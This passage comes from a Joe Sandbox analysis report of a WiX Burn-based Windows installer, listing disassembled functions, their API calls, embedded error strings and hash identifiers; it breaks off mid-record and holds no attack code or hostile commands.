                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                  • String ID: DllGetVersion$Failed to create msi.dll version from QWORD.$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp$msi
                                                                                                                                                                  • API String ID: 4275029093-1657635385
                                                                                                                                                                  • Opcode ID: 18702215f288202fb933df666eb898549a48aa27ab84cb1fe2758e0f355f4546
                                                                                                                                                                  • Instruction ID: fec977be051da41ffa5bec9ba3d8487caff04b3e16af81761ff97c1039fdb585
                                                                                                                                                                  • Opcode Fuzzy Hash: 18702215f288202fb933df666eb898549a48aa27ab84cb1fe2758e0f355f4546
                                                                                                                                                                  • Instruction Fuzzy Hash: 9731D972F8572EB7E7216768DC06FEF666C9B48B54F010115FA05FB2C1E6A89C4087E0
                                                                                                                                                                  Function 0092A9AD Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 62COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096B0E2: EnterCriticalSection.KERNEL32(009AD4F0,00000000,00000000,00000001,0000000C,0000000C,?,0092A885,00000000,00000001,00988FA8,?,00000000,00000000,0000000C,00000000), ref: 0096B0F7
                                                                                                                                                                    • Part of subcall function 0096B0E2: LeaveCriticalSection.KERNEL32(009AD4F0,?,0092A885,00000000,00000001,00988FA8,?,00000000,00000000,0000000C,00000000,00000001,00000000,00000000,00000000,00000008), ref: 0096B2F9
                                                                                                                                                                  • OpenEventLogW.ADVAPI32(00000000,Application), ref: 0092A9D3
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0092A9DF
                                                                                                                                                                  • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,00988E3C,00000000), ref: 0092AA36
                                                                                                                                                                  • CloseEventLog.ADVAPI32(00000000), ref: 0092AA3D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                                  • String ID: Application$Failed to open Application event log$Setup$_Failed$d:\a\wix4\wix4\src\burn\engine\logging.cpp$log
                                                                                                                                                                  • API String ID: 1844635321-122217184
                                                                                                                                                                  • Opcode ID: 6e90424a473b4695ff6411668ec01c2a73246cf3173992b77733f2da9d465057
                                                                                                                                                                  • Instruction ID: 73829ede37e048d67301d07c2f42a7f33c7baf07f9564703f9810331b3956e64
                                                                                                                                                                  • Opcode Fuzzy Hash: 6e90424a473b4695ff6411668ec01c2a73246cf3173992b77733f2da9d465057
                                                                                                                                                                  • Instruction Fuzzy Hash: A0012663A896713BA33232267C4DEBF0C6CDBC6F69B060158FD15F6281E6544C81D2F1
                                                                                                                                                                  Function 0091774C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 188COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(68056A00,?,00000000,?,009180B3,?,?,?,?), ref: 00917792
                                                                                                                                                                  • CloseHandle.KERNEL32(00010068,?,00000000,?,009180B3,?,?,?,?), ref: 009177A9
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(0091876B,?,00000000,?,009180B3,?,?,?,?), ref: 009177BC
                                                                                                                                                                  • CloseHandle.KERNEL32(5468FFFF,?,009180B3,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009177CF
                                                                                                                                                                  • CloseHandle.KERNEL32(53009825,?,009180B3,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009177E6
                                                                                                                                                                  • CloseHandle.KERNEL32(E850C094,0091879F,009187BB,?,009180B3,?,?,?,?), ref: 00917825
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(0091817F,009184EF,0091879F,009187BB,?,009180B3,?,?,?,?), ref: 00917844
                                                                                                                                                                    • Part of subcall function 00969966: LocalFree.KERNEL32(00917FB7,?,00917764,d:\a\wix4\wix4\src\burn\engine\variable.cpp,?,00000000,?,009180B3,?,?,?,?), ref: 00969970
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(009187D7,0091828B,009180F3,0091829F,00918293,009181AB,0091815B,00918133,009182C3,009184D3,0091843B,00918163,?,009180B3,?,?), ref: 009179B6
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091775E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$CriticalDeleteSection$FreeLocal
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 352808245-1905863517
                                                                                                                                                                  • Opcode ID: cd32fa2e8ade1526d7ab35845fa73d5295b3ee930a1858846e52710f6dcd988a
                                                                                                                                                                  • Instruction ID: 52f94fdf440b848d7d8da4618b82830c4bc1ad6358a8d73a530968479947e171
                                                                                                                                                                  • Opcode Fuzzy Hash: cd32fa2e8ade1526d7ab35845fa73d5295b3ee930a1858846e52710f6dcd988a
                                                                                                                                                                  • Instruction Fuzzy Hash: 52613D71B04B09AADA20EBB5D889FDBB3FDAF84340F444819B55AD7155DB34F584CB20
                                                                                                                                                                  Function 0096C951 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 164registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,?,?,0097526C,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,00916CF2,00000000), ref: 0096C9ED
                                                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,?,0097526C,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,00916CF2,00000000), ref: 0096CA1B
                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,?,?,0097526C,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,00916CF2,00000000), ref: 0096CAA2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Enum$InfoQuery
                                                                                                                                                                  • String ID: Failed to allocate string bigger for enum registry key.$Failed to allocate string to minimum size.$Failed to determine length of string.$Failed to enum registry key.$Failed to get max size of subkey name under registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 73471667-3057206726
                                                                                                                                                                  • Opcode ID: 9504ac22eebb64bb7dccc26a5d5f7033a25e5babe7deed380fc110926d32187a
                                                                                                                                                                  • Instruction ID: 4a1ac32c2dde02631d4b9181b603dea8235323761bd33163066ceb9f215a43f4
                                                                                                                                                                  • Opcode Fuzzy Hash: 9504ac22eebb64bb7dccc26a5d5f7033a25e5babe7deed380fc110926d32187a
                                                                                                                                                                  • Instruction Fuzzy Hash: A8410BB6600228BBEB11DB95CC49FBF7AADEFCA710F114055B645EB280E9709D4197A0
                                                                                                                                                                  Function 00972182 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 161COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,00000000,?,00000000,?,00000000,7FFFFFFF,?,00000000,7FFFFFFF,?,00000000,?,00000005,00000000), ref: 009722B9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to canonicalize the directory.$Failed to canonicalize the path.$Failed to get length of canonicalized directory.$Failed to get length of canonicalized path.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp$wzDirectory is required.$wzDirectory must be a fully qualified path.$wzPath is required.
                                                                                                                                                                  • API String ID: 1825529933-3471778437
                                                                                                                                                                  • Opcode ID: c3f5eb5cfcbe262b70ebc57193650d38e750ee5d4529de49718b58ffbb924ed0
                                                                                                                                                                  • Instruction ID: bf3ea66bc6b7bab6c71559aea9a580ee2b5cc175821ab2803111b9c2c15e4dd8
                                                                                                                                                                  • Opcode Fuzzy Hash: c3f5eb5cfcbe262b70ebc57193650d38e750ee5d4529de49718b58ffbb924ed0
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F412932B90719B7EB205B908C8AFEF66AC9F95F44F118125B718BE1C1E7F49E409690
                                                                                                                                                                  Function 0093D520 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 161sleepwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 0093D55B
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0093D56A
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,?), ref: 0093D57E
                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0093D58E
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0093D59E
                                                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 0093D612
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0093D675
                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0093D6EE
                                                                                                                                                                  Strings
                                                                                                                                                                  • =======================================, xrefs: 0093D63E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long$Proc$MessagePostQuitSleep
                                                                                                                                                                  • String ID: =======================================
                                                                                                                                                                  • API String ID: 305784972-300222271
                                                                                                                                                                  • Opcode ID: 141a9b59c344e0060d77e79ce77fc9f47be98bd54b58b855ee9c4d42f3c21364
                                                                                                                                                                  • Instruction ID: 470f940ee987cb43d35d3a330381d559f59217cc4c546c02a9d6c288dc9fb7e4
                                                                                                                                                                  • Opcode Fuzzy Hash: 141a9b59c344e0060d77e79ce77fc9f47be98bd54b58b855ee9c4d42f3c21364
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C516872505124FBCB11AFA8EC5AF6E3B6DEF84308F054154F92EBB161DB358D009EA5
                                                                                                                                                                  Function 0091D1D3 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 157COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                  • String ID: Failed to find variable.$Failed to format variable '%ls' for condition '%ls'$Failed to get if variable is hidden.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$Failed to store formatted value for variable '%ls' for condition '%ls'$d:\a\wix4\wix4\src\burn\engine\condition.cpp$feclient.dll
                                                                                                                                                                  • API String ID: 2001391462-821846985
                                                                                                                                                                  • Opcode ID: ddb19a163e902bdb774844fefbacd6cf16946c5040295653bf152da3fd6a2730
                                                                                                                                                                  • Instruction ID: bac900645bf76d6ebb82f4523c9e82c8fb259bf716dbdb867785e85f867b4ab7
                                                                                                                                                                  • Opcode Fuzzy Hash: ddb19a163e902bdb774844fefbacd6cf16946c5040295653bf152da3fd6a2730
                                                                                                                                                                  • Instruction Fuzzy Hash: B9412632781218B7EF222A54CC4AFEB39789B89B14F014515FA10BE291D2B1DD9187E1
                                                                                                                                                                  Function 0094A0F4 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 154COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,00916CF2,00000000,?,?,?,0094A0C7,00000000,00916CF2,00000000,00000000,00000000), ref: 0094A123
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0094A0C7,00000000,00916CF2,00000000,00000000,00000000,?,0094C452,00000000,00000000,00000000,00000000,00000000), ref: 0094A133
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                                                  • String ID: Failed to append cache action.$Failed to append checkpoint before package start action.$Failed to append rollback cache action.$Failed to create syncpoint event.$Failed to plan cache for package.$Failed to plan package cache syncpoint$d:\a\wix4\wix4\src\burn\engine\plan.cpp
                                                                                                                                                                  • API String ID: 545576003-3436273000
                                                                                                                                                                  • Opcode ID: 867a62d44185fd4cb96475481dc53e90d27810f81fbe51cf48650b8d2127d289
                                                                                                                                                                  • Instruction ID: 20a186d70c82c5c2f800adb935c732c6744e5b8c0bf89db89dac9b6c904baaff
                                                                                                                                                                  • Opcode Fuzzy Hash: 867a62d44185fd4cb96475481dc53e90d27810f81fbe51cf48650b8d2127d289
                                                                                                                                                                  • Instruction Fuzzy Hash: EF41D571AC0724BBEB228B55CC49FAB7AACAB45B54F110055FD04BF281E7F49D40E7A1
                                                                                                                                                                  Function 0092D5B2 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 149COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00000000,00000001,80000005,00000000,00000000,00000000,00000000,00000003,000007D0), ref: 0092D752
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate access for Everyone group to path: %ls, xrefs: 0092D661
                                                                                                                                                                  • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 0092D633
                                                                                                                                                                  • Failed to allocate access for Users group to path: %ls, xrefs: 0092D68F
                                                                                                                                                                  • Failed to create ACL to secure cache path: %ls, xrefs: 0092D6E8
                                                                                                                                                                  • Failed to allocate access for Administrators group to path: %ls, xrefs: 0092D605
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 0092D6DD, 0092D736
                                                                                                                                                                  • Failed to secure cache path: %ls, xrefs: 0092D724
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLocal
                                                                                                                                                                  • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 2826327444-3214910189
                                                                                                                                                                  • Opcode ID: c7cc11cf7b3a3d952070fd5d8f51203e945735544359b1c42943f98116be195a
                                                                                                                                                                  • Instruction ID: 7764b5d316545cc39f25c63d949aa6cb55817ae162713edbd44d41e87b586a89
                                                                                                                                                                  • Opcode Fuzzy Hash: c7cc11cf7b3a3d952070fd5d8f51203e945735544359b1c42943f98116be195a
                                                                                                                                                                  • Instruction Fuzzy Hash: CA410771B8173D76E731A6509C0AFEF6A6CAF80F14F114050BB48BE1C5EAE09D4487E0
                                                                                                                                                                  Function 0091467E Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 143COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000105,?,0100147D,?,00000105,00000000,00000000,0100147D,?,00000000,00916570), ref: 0091470D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FullNamePath
                                                                                                                                                                  • String ID: Failed to allocate space for full path.$Failed to get current directory.$Failed to get full path for string: %ls$Failed to get max length of input buffer.$Failed to reallocate space for full path.$GetFullPathNameW results never converged.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                  • API String ID: 608056474-2352071517
                                                                                                                                                                  • Opcode ID: e5bd203569ceefc5583d9c2d9076269c32373cad63f3b6dd1a795044a368ab1a
                                                                                                                                                                  • Instruction ID: 9516e6cf7a8c80729121eaab81d5523e31681e8385bdaa660cb5595359d66f15
                                                                                                                                                                  • Opcode Fuzzy Hash: e5bd203569ceefc5583d9c2d9076269c32373cad63f3b6dd1a795044a368ab1a
                                                                                                                                                                  • Instruction Fuzzy Hash: 70410A72B4132D77EB319A548C4AFEF3A68DF4AB60F114424F915BB2C1E7B09C8086A0
                                                                                                                                                                  Function 00920648 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 118COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize file search., xrefs: 00920671
                                                                                                                                                                  • Directory search: %ls, failed get to directory attributes. '%ls', xrefs: 00920703
                                                                                                                                                                  • Failed to set variable., xrefs: 00920761
                                                                                                                                                                  • Directory search: %ls, did not find path: %ls, xrefs: 00920725
                                                                                                                                                                  • Directory search: %ls, found file at path: %ls, xrefs: 00920741
                                                                                                                                                                  • Failed to format variable string., xrefs: 0092069E
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 009206F3, 009206F8, 00920715, 00920773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Directory search: %ls, did not find path: %ls$Directory search: %ls, failed get to directory attributes. '%ls'$Directory search: %ls, found file at path: %ls$Failed to format variable string.$Failed to initialize file search.$Failed to set variable.$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                  • API String ID: 0-1139486771
                                                                                                                                                                  • Opcode ID: 13b63da56e2975b9205d95a03315f08176550c14ca15cad4be21b2452a2268f4
                                                                                                                                                                  • Instruction ID: a41a1322249d4397ab7cc5777d96bdde9bfca767e04d755e8b06ede9740ff643
                                                                                                                                                                  • Opcode Fuzzy Hash: 13b63da56e2975b9205d95a03315f08176550c14ca15cad4be21b2452a2268f4
                                                                                                                                                                  • Instruction Fuzzy Hash: 70316E32E412397BDB116A54AC4BF9EBA6CAFC4710F010611FE14B62D3E770AD509BD0
                                                                                                                                                                  Function 009208D7 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 118COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize file search., xrefs: 00920900
                                                                                                                                                                  • File search: %ls, failed get to file attributes. '%ls', xrefs: 00920992
                                                                                                                                                                  • Failed to set variable., xrefs: 009209F0
                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 009209B4
                                                                                                                                                                  • File search: %ls, found directory at path: %ls, xrefs: 009209D0
                                                                                                                                                                  • Failed to format variable string., xrefs: 0092092D
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 00920982, 00920987, 009209A4, 00920A02
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to format variable string.$Failed to initialize file search.$Failed to set variable.$File search: %ls, did not find path: %ls$File search: %ls, failed get to file attributes. '%ls'$File search: %ls, found directory at path: %ls$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                  • API String ID: 0-1703314674
                                                                                                                                                                  • Opcode ID: 2551127ec963d01eca4aa6328368e399967c01c4b1a11f2b62deaddaca2d9a52
                                                                                                                                                                  • Instruction ID: b6f344b099bc8602799855fec014d4785e4d8a780361b3426a0d15618a01ecd7
